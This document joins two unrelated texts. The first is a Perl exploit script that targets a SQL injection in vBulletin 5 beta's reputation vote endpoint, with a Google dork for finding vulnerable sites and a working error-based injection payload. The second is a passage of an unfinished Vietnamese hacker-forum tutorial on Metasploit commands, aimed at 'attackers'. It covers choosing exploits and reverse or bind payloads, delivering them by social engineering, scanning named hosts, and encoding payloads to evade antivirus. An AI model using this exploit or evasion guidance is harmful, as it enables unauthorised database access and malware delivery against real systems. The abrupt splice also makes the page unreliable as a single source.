# Exploit Title: vBulletin 5 Beta XX SQLi 0day# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
 
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
 
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;</pre>
<b>&nbsp;</b></div>

Mình đã xem trên mạng.Tài liệu về Metasploit Framework tiếng việt khá ít.Và không đầy đủ.Nên mình viết lại những gì mình biết ,tham khảo thêm một số nguồn tiếng anh [ Mục đích là để giúp newbie biết rõ hơn ,và để làm tài liệu chính thức từ vhb,Không phải lấy từ nguồn khác.Có một bài kakavn_85 leech về vhb rồi.

Nhưng bài đó khá sơ sài ,nên mình viết lại bài này].Hiện tại còn một số phần chưa hoàn thành.Anh em nào am hiểu về các module encoders module và Nops module trong metasploit framework thì pm yahoo mình icarus_ken.Để cùng mình biên soạn kĩ hơn về 2 phần này.

-Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode (payload) để tấn công máy có lỗ hổng.Cùng với một số bộ công cụ bảo mật khác,Metasploit có cơ sở dữ liệu chứa hàng ngàn shellcode ,hàng ngàn exploit của các hệ điều hành,các chương trình hay dịch vụ.Trong quá trình phát triển metasploit liên tục cập nhật các Exploit...Nên càng ngày nó càng trở thành một bộ công cụ mạnh mẽ.

-Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn (pentesting ) nhưng đối với những attacker như chúng ta,thì nó thực sự là một công cụ vô cùng hữu ích ( dùng để kiểm tra ,khai thác lỗi ,exploit ).Thực sự theo mình nghĩ thì ai muốn làm hacker (hay script kidie đi chăng nữa ) thì cũng nên bỏ thời gian ra nghiên cứu kĩ về nó.

-Nói sơ qua Metasploit framework là một phần nhỏ của dự án Metaspoit ( đc xây dựng từ ngôn ngữ perl sau đó đc viết lại bằng ruby.Đúng ra là chủ yếu bằng ruby).
Bộ metasploit framwork hỗ trợ giao diện cho nguời dùng dưới nhiều dạng

• -Console interface : Dùng lệnh msfconsole .Đa số thao tác bằng dòng lệnh.
• -GUI -armitage : Dùng Armitage để vào.Đây là giao diện đồ họa.
• -Command line interface : dùng lệnh msfcli để vào

Ta chủ yếu thực thi trên msfconsole ,nhìn cho nó chuyên nghiệp )
Msfconsole có nhiều câu lệnh,option khác nhau.Dứoi đây là nội dung các lệnh đối với msfconsole .

==========================
1 back
2 check
3 connect
4 info
5 irb
6 jobs
7 load
7.1 loadpath
7.2 unload
8 resource
9 route
10 search
10.1 help
10.2 name
10.3 path
10.4 platform
10.5 type
10.6 author
10.7 multiple
11 sessions
12 set

12.1 unset

13 setg
14 show
14.1 auxiliary
14.2 exploits
14.3 payloads
14.3.1 payloads
14.3.2 options
14.3.3 targets
14.3.4 advanced
14.4 encoders
14.5 nops
15 use
=======================
Mình sẽ trình bày sơ nội dung của những lệnh này.

+back : lệnh này dùng khi bạn muốn thoát ra khỏi module bạn đã chọn trước đó sau khi hoàn thành công việc,hoặc muốn chuyển sang module khác.Tất nhiên là có thể chọn ngay module khác luôn mà không cần thoát ra.
ví dụ

msf payload(reverse_http) > back
msf>

+check : Lệnh naỳ giúp ta kiểm tra đã cấu hình đúng cho exploit chưa,mọi việc đã hoàn thành chưa.Cho ta biết kết quả mà không cần phải thực thi exploit đó.Nhưng không phải tất cả mọi exploit đều hỗ trợ lệnh này.

+connect : Lệnh này giống như một bản netcat thu nhỏ đc cho vào metasploit đc hỗ trợ với ssl,proxy,povoting...Với việc dùng câu lệnh connect với địa chỉ ip và port tương ứng,chúng ta có thể connect tới một host từ metasploit giống như khi dùng với netcat hoặc telnet vậy.
ví dụ như
msf > connect 118.69.228.254 22[*] Connected to 118.69.228.254:22
SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1

+info : lệnh này cho biết những thông tin chi tiết của một module (hay một exploit nào đó ) .hiện thị cho ta thông tin cơ bản nhất,bao gồm cả các option cần thiết....




+irb : lệnh này cho ta thao tác trên môi trường của ruby

ví dụ
msf > irb -h[*] Starting IRB shell...
>> puts "welcom to vhbfamily"
welcom to vhbfamily
=> nil


+jobs: lệnh này cho ta biết các module đang chạy.
ví dụ

msf > jobs
Jobs
====
No active jobs.
msf > jobs -h
Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-i <opt> Lists detailed information about a running job.
-k <opt> Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and -l


+load: lệnh này để load một plugin từ metasploit plugins.
ví dụ:ta liệt kê ra danh sách các plugin có và load thử một cái.Sau đó unload luôn plugin mà chúng ta vừa load.

msf > cd /opt/metasploit/msf3/plugins/
msf > ls[*] exec: ls
alias.rb
auto_add_route.rb
db_credcollect.rb
db_tracker.rb
editor.rb
event_tester.rb
ffautoregen.rb
ips_filter.rb
lab.rb
msfd.rb
msgrpc.rb
nessus.rb
nexpose.rb
openvas.rb
pcap_log.rb
sample.rb
session_tagger.rb
socket_logger.rb
sounds.rb
thread.rb
token_adduser.rb
token_hunter.rb
wmap.rb
msf > load alias.rb[*] Successfully loaded plugin: alias
msf > unload alias.rb

+search :command giúp ta tìm kiếm exploit,auxiliary,encoder.... (trong đó nó còn hỗ trợ một số keywork giúp cải tiến khả năng tìm kiếm như


Keywords:
name : Modules with a matching descriptive name
path : Modules with a matching path or reference name
platform : Modules affecting this platform
port : Modules with a matching remote port
type : Modules of a specific type (exploit, auxiliary, or post)
app : Modules that are client or server attacks
author : Modules written by this author
cve : Modules with a matching CVE ID
bid : Modules with a matching Bugtraq ID
osvdb : Modules with a matching OSVDB ID
edb : Modules with a matching Exploit-DB ID
Ví dụ như :
search cve:2009 type:exploit app:client

+sessions: lệnh này liệt kê các session đang tồn tại ,session ở đây có thể là session của shell,của meterpreter ....

+set : lệnh cho phép ta cấu hình cho các exploit...lệnh này gặp thường xuyên .(unset là lệnh có ý nghĩa nguợc lại ).

+setg: trong quá trình thực hiện tấn công một mục tiêu,hoặc nhiều mục tiêu.Ta có thể dùng một exploit hoặc đôi khi là nhiều exploit.Có một vào option nếu set bình thường thì ta phải set nhiều lần.Nhưng nếu ta để cho các option này có ý nghĩa toàn cục.Thì việc lặp lại là không cần.Nó có hiệu lực cho mọi exploit,auxiliary .Đó là ý nghĩa của setg (global set).Để hủy thì ta dùng unsetg .Nếu muốn lưu việc cấu hình này lại dùng lệnh "save".

+show : lệnh này cho phép hiện thị tùy theo tham số đi sau nó .Nếu là "show all" thì nó hiện thị tất cả các module có trong metasploit framework,còn nếu "show exploits" thì nó chỉ hiện thị các exploit có trong module exploits mà thôi.Tương tự cho các module khác.Lệnh show còn dùng để cho ta thấy các tham số thuộc tính (show options).

+use : lệnh này dùng để chọn và dùng một exploit,auxiliary...nào đó.


Cách dùng metasploit đc làm theo qui định chung sau

Chọn một module để attack (Thường ta dùng module Exploies và Auxiliary để attack,các module khác hỗ trợ cho 2 module này).
Có thể dùng lệnh "show all" .Nó sẽ liệt kê tất cả các modules ra cho ta.
Để hiện thị các exploit,auxiliary,payload... của một Module cụ thể hơn ta dùng lệnh "show type_module" mình ví dụ như :show exploits , show encoders,show payload,show nops....

Xem biểu đồ sau để hình dung kĩ hơn về cấu trúc của metasploit framework

• REX : Thư viện ruby cho các công việc bảo mật
• Framework Core :Cung cấp giao diện cho việc chạy các module và plugins.
• MSF Base : để dễ giao tiếp hơn với các module trong framework.

Exploit Modules.
Đầu tiên chọn exploit,muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit framework có hỗ trợ.

Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là tên của exploit đc metasploit hỗ trợ,để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit".
ví dụ mình sử dụng một exploit sau khi đã liệt kê ra sẽ là:
use windows/manage/add_user_domain

Sau khi đã chọn một exploit với command use,việc tiếp theo là cấu hình các options mà exploit này yêu cầu.(Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào,phải cấu hình những gì,ta sử dụng lệnh "show options".
Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau:

Name-----Current Setting-------Required---------Description

Trong đó,ở cột required nếu giá trị là "yes" thì bạn phải set giá trị cho tham số này,còn nếu là "no" thì nếu thích thì bạn set cho nó,nếu ko thích thì cũng chẳng sao.Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có thích hợp với chúng ta hay ko. (Ngoài ra nó còn có thêm một số options khác,dùng "show advanced" , "show evasion" để xem nhé.

Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng chưa.
Để kiểm tra việc cấu hình ta dùng lệnh "check " để xem mục tiêu có bị tấn công đc hay không.Đây là một cách nhanh để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu thực sự có lỗ hổng để khai thác được hay không.Nhưng không phải tất cả các exploit đều thực sự có thể kiểm tra được bằng việc sự dụng lệnh check.Đôi khi ta phải thực sự exploit nó mới biết đc )

* Chọn môi trường họat động.
Nhiều exploits nó còn yêu cầu môi trường có thể thực hiện chứ không phải môi trường nào nó cũng có thể làm đc.Chính vì vậy ta dùng lệnh "show targets " để xem trên môi trường nào có thể exploit.
ví dụ như:

exploit(java_signed_applet) > show targets
Exploit targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows x86 (Native Payload)
2 Linux x86 (Native Payload)
3 Mac OS X PPC (Native Payload)
4 Mac OS X x86 (Native Payload)


Cho ta thấy danh sách các môi trường có thể họat động.
để chọn môi trường cho nó ta dùng lệnh "set number_of_target" . Trong đó đối số number_of_target là số thứ tự (số id) khi liệt kê ra.Điều gì xảy ra nếu bạn không chọn môi trường target ? .Trong quá trình exploit nó sẽ tự chọn mặc định cho ta.Và thực tế điều này không phải khi nào cũng đúng như mong đợi.Vì vậy ta chọn bằng tay là tốt nhất.(Tất nhiên phải scan OS trước).

* Chọn Payload : (Selecting the Payload).

Trước tiên Payload là gì.Bạn có thể hiểu nó đơn giản như các thuật ngữ thuờng quen với các bạn hơn như là trojan chẳng hạn.Nó là một đoạn code đc chạy (thực thi )trên máy victim,dùng để thực hiện một số họat động nào đó,hoặc dùng để kết nối về máy attacker.Vậy làm sao để có cái Payload ) này trên máy của victim ? .Có 2 phương pháp chủ yếu được dùng.Phân loại ra vậy thôi chứ khi dùng thì còn tùy trường hợp mà dùng.Đó là gửi cho victim thông qua việc phân tính một lỗi,lỗ hổng nào đó trên hệ thông victim,từ đó đột nhập và vất đoạn payload này cho victim.Để đó chơi.Kiểu thứ 2 là gửi trực tiếp cho victim,chờ đợi victim sơ ý nhận nó ( kĩ thuật social engineering đấy ).

Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng.ta dùng lệnh "show payloads" ,ví dụ mình minh họa bằng 3 payload sau :

windows/dllinject/bind_nonx_tcp - normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp - ormal Reflective DLL Injection, Bind TCP Stager
windows/meterpreter/reverse_http -normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager

Như ta thấy có nhiều payload,tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau,và phương pháp cũng khác nhau. Các giao thức dùng cũng khác nhau....Nhìn chung đối với payload có thể phân ra làm 2 loại cơ bản đó là bind payload,và reverse payload .Khi nào ta dùng loại nào.Đây cũng là một vấn đề quan trọng.Nếu như máy của bạn (đóng vai trò là attacker) đứng sau một tường lửa,thì lúc này bạn nên dùng bind payload .Mở một port trên máy tính và kết nối trực tiếp từ máy attacker đến máy victim.Còn nếu như victim đứng sau một tường lửa,còn chúng ta thì không,khi đó chúng ta dùng reverse payload,để connect ngược từ máy victim về ta (attacker ).Như vậy cho thấy khi tấn công mục tiêu.Ta phải tìm hiểu rõ ràng về mục tiêu.Scan,tìm kiếm tất cả các thông tin có thể có.Dựa vào đó mà chọn cách thích hợp.

Khi bạn quyết định chọn một payload nào đó,dùng lệnh "set PAYLOAD name_payload" để chọn payload cần dùng.
giải sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là :

set PAYLOAD windows/meterpreter/reverse_ord_tcp
nhận đc là :PAYLOAD => windows/meterpreter/reverse_ord_tcp

Tượng tự để xem rõ thông tin,option về payload ta có thể dùng các lệnh như "show options" ,"info name_payload" ,"show advanced" ,"show evasion"...

Nhắc thêm một lần nữa,đó là payload đc chọn phải phù hợp với môi trường thực thi đã chọn ở trên .Nếu mục tiêu là linux mà dùng payload cho window thì thua rồi.
Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem thành quả.



MODULE AUXILIARY:
cung cấp chức năng tăng cường cho các thử nghiệm xâm nhập và quét lỗ hổng cùng với các tác vụ tự động.
phân loại trong auxiliary module:


-module quét các giao thức ( như SMB,HTTP).
-Module quét cách cổng port
-Wireless
-IPV6
-DOS
-Server modules.
-Module khai thác truy cập quản trị

Mình ví dụ về một dịch vụ quét ssh .Nó hỗ trợ các dịch vụ khá đầy đủ .Lúc show auxiliary ra sẽ thấy,rất là nhiều.( Để tìm các exploit hay auxiliary một cách nhanh hơn,ta dùng lệnh search,chứ tất nhiên không thể nhớ hết,hoặc liệt kê ra thì tìm cũng mỏi mắt.Ví dụ mình muốn quét ssh đi,thì thực hiện "search ssh".



Chú ý trong auxiliary module việc set remote host ta dùng "set RHOSTS" chứ không phải là "set RHOST" như bên exploit module đâu đấy.

Như trong ví dụ ta scan được phiên bản ssh của server 118.69.228.254. Các tham số còn lại mình để mặc định hết.

Ví dụ về scan port: Mình sẽ scan xem site nào mở cổng 443 (https) và 80 dùng giao thức tcp đối với các site nằm trong server chứa kmasecurity.net



Việc sử dụng auxiliary nói tóm lại gồm 3 bước căn bản,đó là chọn auxiliary,sau đó set các option cần thiết cho nó.Cuối cùng là run để thực hiện thôi.Việc nắm đc tất cả các auxiliary là rất tốt.Sẽ giúp chúng ta linh động hơn trong việc tấn công một đối tượng nào đó.
Các lệnh payload thường dùng là:

• generate :để phát sinh một payload.
• pry:Để mở một pry( một tính năng thay thế cho tiêu chuẩn IRB shell của ruby) session trong module hiện tại.
• reload : để chạy lại reload lại module hiện tại

Module Payloads:Như đã nói ở trên nó là một shellcode.Trong metasploit framework cung cấp sẵn khá nhiều loại payloads.
Đoạn trên mình đã nói sơ qua payload,chắc mọi người cũng đã hình dung được về payload rồi.Ở phần này mình trình bày thêm về module payload.
Dùng lệnh "show payloads" để liệt kê các payload có trong metasploit.

Để tìm hiểu kĩ hơn về các lệnh này ta dùng tham số -h (--help) ,từ đó mà set các giá trị thích hợp.Mình minh họa một ví dụ.






Như ta thấy có thể dùng option -E để encode cho payload của chúng ta,tăng khả năng vượt antivirut.
nếu không chọn gì thì có thể type lệnh đơn giản là "generate" thôi là đc rồi.
Trong quá trình encoding, payload đc encoding và đc chèn vào những kí tự đặc biệt.
Tất nhiên ta có thể tự chọn các bộ công cụ encode khác nhau trong metasploit .Ví dụ để encode một payload ,Ta muốn thử các kiểu encoding khác nhau.Có thể sử dụng lệnh "show encoders".Lúc này nó sẽ hiện ra một loạt các bộ công cụ encode.Sử dụng một bộ encoding nào đó ta type như sau : "generate -e x86/shikata_ga_nai". Trong đó "x86/shikata_ga_nai" là một bộ encoding trong encoders module.
Có rất nhiều bộ encoder đc hỗ trợ của Metasploit framework.Chính vì vậy bạn nên chọn một bộ nào đó để encode .Giúp hiệu quả hơn trong quá trình ẩn mình.

--to be continue.